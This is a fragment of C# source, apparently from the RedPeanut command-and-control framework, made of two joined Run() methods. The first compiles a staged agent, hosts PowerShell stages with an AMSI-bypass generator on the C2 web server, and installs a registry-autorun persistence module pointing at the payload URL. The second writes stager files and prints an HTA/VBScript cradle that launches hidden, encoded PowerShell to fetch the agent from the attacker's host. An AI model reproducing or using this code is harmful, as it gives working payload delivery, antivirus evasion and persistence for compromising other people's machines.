private void Run()
{
try
{
List <string> args = new List <string>();
if (!string.IsNullOrEmpty(keyname) && !string.IsNullOrEmpty(reghive))
{
//Create webresource
//Register web resource
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
string filename = RandomAString(10, new Random()).ToLower();
ListenerConfig conf = new ListenerConfig("",
((AgentInstanceHttp)agent).GetAddress(),
((AgentInstanceHttp)agent).GetPort(),
Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()),
((AgentInstanceHttp)agent).GetProfileid());
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
string assemblyBase64 = Builder.GenerateDllBase64(source, filename + ".dll");
byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));
Dictionary <string, string> argagent = new Dictionary <string, string>();
argagent.Add("#{bytelen}", assemblybytte.Length.ToString());
string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()).ContentUri;
uricontent = uricontent.TrimStart('/');
if (!uricontent.EndsWith("/"))
{
uricontent += "/";
}
Dictionary <string, string> arg = new Dictionary <string, string>
{
{ "#{lhost}", ((AgentInstanceHttp)agent).GetAddress() },
{ "#{lport}", ((AgentInstanceHttp)agent).GetPort().ToString() },
{ "#{uri}", uricontent + "s2_" + filename + ".ps1" }
};
PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
//Add resource to webserver storage
C2Manager c2manager = Program.GetC2Manager();
c2manager.GetC2Server().RegisterWebResource(filename + ".ps1", new WebResourceInstance(gen_s1, filename + ".ps1"));
c2manager.GetC2Server().RegisterWebResource("s2_" + filename + ".ps1", new WebResourceInstance(gen_s2, "s2_" + filename + ".ps1"));
Console.WriteLine("[*] Resource added to webserver resources");
string proto = "";
if (ssl)
{
proto = "https";
}
else
{
proto = "http";
}
string url = string.Format("{0}://{1}:{2}/{3}{4}", proto, ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), uricontent, filename + ".ps1");
string perssrc = File.ReadAllText(Path.Combine(folderrpath, PERSAUTORUN_TEMPLATE));
perssrc = Replacer.ReplacePersAutorun(perssrc, reghive, url, keyname, encoded);
RunAssemblyBase64(
Convert.ToBase64String(
CompressGZipAssembly(
Builder.BuidStreamAssembly(perssrc, RandomAString(10, new Random()).ToLower() + ".dll", 40, compprofile: CompilationProfile.SSploitPersistence)
)
),
"PersAutorun",
new string[] { " " },
agent);
return;
}
}
catch (Exception e)
{
Console.WriteLine("[x] Error generating task {0}", e.Message);
}
}
private void Run()
{
List <string> args = new List <string>();
try
{
if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
{
return;
}
else
{
// Parse .cs sorce and repalce variable
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
string assemblyBase64 = Builder.GenerateDllBase64(source, filename);
Dictionary <string, string> arg = new Dictionary <string, string>();
arg.Add("#{lhost}", lhost);
arg.Add("#{lport}", lport.ToString());
string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;
uricontent = uricontent.TrimStart('/');
if (!uricontent.EndsWith("/"))
{
uricontent += "/";
}
arg.Add("#{uri}", uricontent + "s2_" + filename);
byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));
Dictionary <string, string> argagent = new Dictionary <string, string>();
argagent.Add("#{bytelen}", assemblybytte.Length.ToString());
PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
if (hosted)
{
//Add resource to webserver storage
C2Manager c2manager = Program.GetC2Manager();
c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen_s1, filename));
c2manager.GetC2Server().RegisterWebResource("s2_" + filename, new WebResourceInstance(gen_s2, "s2_" + filename));
Console.WriteLine("[*] Resource added to webserver resources");
Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
Console.WriteLine("[*]");
Console.WriteLine("[*] Cradle example");
Console.WriteLine("[*]");
Console.WriteLine("<script language = \"VBScript\">");
Console.WriteLine(" Function etaget()");
Console.WriteLine("");
Console.WriteLine(" Dim ahsten");
Console.WriteLine(" Set ahsten = CreateObject(\"Wscript.Shell\")");
Console.WriteLine(" ahsten.run \"powershell.exe -nop -w 1 -enc {0}\", 0, true", gen_s0.GetScriptText());
Console.WriteLine(" End Function");
Console.WriteLine("");
Console.WriteLine(" etaget");
Console.WriteLine(" self.close");
Console.WriteLine("</script>");
Console.WriteLine("[*]");
return;
}
else
{
//Write file to tmp env dir
File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen_s1.GetScriptText());
File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + filename), gen_s2.GetScriptText());
Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + filename));
}
}
}
}
catch (Exception e)
{
Console.WriteLine("[*] Error running task build {0}", e.Message);
return;
}
}
